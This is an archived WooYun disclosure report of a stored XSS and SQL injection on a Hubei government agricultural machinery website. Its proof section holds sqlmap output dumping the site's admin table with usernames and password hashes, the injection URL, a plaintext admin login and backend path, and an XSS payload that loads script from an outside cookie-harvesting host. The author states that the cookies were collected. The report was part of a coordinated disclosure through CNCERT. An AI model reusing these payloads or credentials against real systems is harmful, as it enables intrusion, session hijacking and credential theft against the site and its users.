当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098919

漏洞标题:湖北省农机安全监理推广信息网存储型XSS+SQL注入(已打Cookies)

相关厂商:cncert国家互联网应急中心

漏洞作者: 龙帝

提交时间:2015-03-02 16:56

修复时间:2015-04-16 16:58

公开时间:2015-04-16 16:58

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-06: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

湖北省农机安全监理推广信息网存储型XSS+SQL注入(已打Cookies)

详细说明:

sql+xss

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: classId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classId=103 AND 6332=6332
---
[10:47:53] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:47:53] [ERROR] cannot retrieve column names, back-end DBMS is Access
[10:47:53] [INFO] fetching entries of column(s) 'classid, id, orderid, password,
 setting, username, usernmae' for table 'admin' in database 'Microsoft_Access_ma
sterdb'
[10:47:53] [INFO] fetching number of column(s) 'classid, id, orderid, password,
setting, username, usernmae' entries for table 'admin' in database 'Microsoft_Ac
cess_masterdb'
[10:47:53] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:47:53] [INFO] retrieved:
[10:47:54] [WARNING] reflective value(s) found and filtering out
3
[10:47:55] [INFO] heuristics detected web page charset 'GB2312'
[10:47:55] [INFO] fetching number of distinct values for column 'id'
[10:47:55] [INFO] retrieved: 3
[10:47:57] [INFO] using column 'id' as a pivot for retrieving row data
[10:47:57] [INFO] retrieved: 1
[10:48:01] [INFO] retrieved: 103
[10:48:12] [INFO] retrieved: 4
[10:48:16] [INFO] retrieved: 0
[10:48:19] [INFO] retrieved: e583273c626a4876
[10:49:01] [INFO] retrieved:
[10:49:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
hubeinongji
[10:49:52] [INFO] retrieved:
[10:49:53] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[10:49:53] [INFO] retrieved: 3
[10:49:57] [INFO] retrieved: 103
[10:50:05] [INFO] retrieved: 4
[10:50:09] [INFO] retrieved: 0
[10:50:12] [INFO] retrieved: 7a57a5a743894a0e
[10:51:03] [INFO] retrieved: fitdoing
[10:51:25] [INFO] retrieved:
[10:51:26] [INFO] retrieved: 4
[10:51:29] [INFO] retrieved: 103
[10:51:38] [INFO] retrieved: 4
[10:51:42] [INFO] retrieved: 0
[10:51:45] [INFO] retrieved: 39776a07e1c3a922
[10:52:30] [INFO] retrieved: hbnj
[10:52:42] [INFO] retrieved:
[10:52:43] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack t
hem via a dictionary-based attack? [y/N/q] N
Database: Microsoft_Access_masterdb
Table: admin
[3 entries]
+----+---------+---------+---------+----------+-------------+------------------+
| id | classid | orderid | setting | usernmae | username    | password         |
+----+---------+---------+---------+----------+-------------+------------------+
| 1  | 103     | 4       | 0       | <blank>  | hubeinongji | e583273c626a4876 |
| 3  | 103     | 4       | 0       | <blank>  | fitdoing    | 7a57a5a743894a0e |
| 4  | 103     | 4       | 0       | <blank>  | hbnj        | 39776a07e1c3a922 |
+----+---------+---------+---------+----------+-------------+------------------+
[10:53:31] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file 'F:
\SqlMap\Bin\output\www.hbnjjl.gov.cn\dump\Microsoft_Access_masterdb\admin.csv'
[10:53:31] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 784 times
[10:53:31] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\
www.hbnjjl.gov.cn'


注入点:http://www.hbnjjl.gov.cn/listDirect.asp?classId=102
asp+access 没啥可说的。
主要还是那啥。有个站长信箱。

QQ截图20150301105659.png


QQ截图20150301105821.png


搜索过滤了<..这里居然啥都没过滤.邪恶了 - -

</div><script>alert("wooyun")</script>


</textarea>'"><script src=http://webxss.net/A6JnLp?1425178565></script>


在上面已经拿到了后台账号密码。。直接进去看看。。
后台:http://www.hbnjjl.gov.cn/adminManage/
username:fitdoing password:admin

QQ截图20150301110259.png


找到站长信箱!

QQ截图20150301110335.png


cookies也收到了。

QQ截图20150301110429.png

修复方案:

过滤

版权声明:转载请注明来源 龙帝@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-06 17:32

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。

最新状态:

暂无